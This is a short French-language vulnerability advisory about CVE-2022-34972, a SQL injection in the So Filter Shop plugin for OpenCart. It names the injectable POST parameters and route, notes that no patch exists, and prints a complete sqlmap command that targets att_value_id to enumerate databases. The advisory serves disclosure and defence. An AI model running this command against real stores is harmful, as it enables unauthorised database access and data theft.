Faille CVE sur le CMS OpenCART plugin So Filter Shop

opencart
Cliquez ici

Opencart est un CMS typé boutique. Il est vulnérable via le plugin so filter shop à une cyberattaque de type SQL INJECTION.

La version v3.x du plugin permet une attaque via les paramètres :

  • att_value_id
  • manu_value_id
  • opt_value_id
  • subcate_value_id

sur l’url /index.php?route=extension/module/so_filter_shop_by/filter_data

Il n’y a pour le moment aucun patch pour combler cette faille CVE

Exemple de commande SQLMAP

				
					sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agent
Information Valeur

CVE
CVE-2022-34972

CVE publié le

05/07/2022

Score
7.5

Fuite de données
Partielle

Intégrité Système
Partielle

Impact sur les ressources
Partielle

Compléxité
Moyenne

Authentification requise
Non

Vous avez besoin d'aide ?

Contactez nous !!!

6ber-network est un site francophone d’informations et de formations sur la Cyber-Sécurité.

  • Tutorials
  • Resources
  • Guides
  • Docs

A Propos

  • Community
  • Blog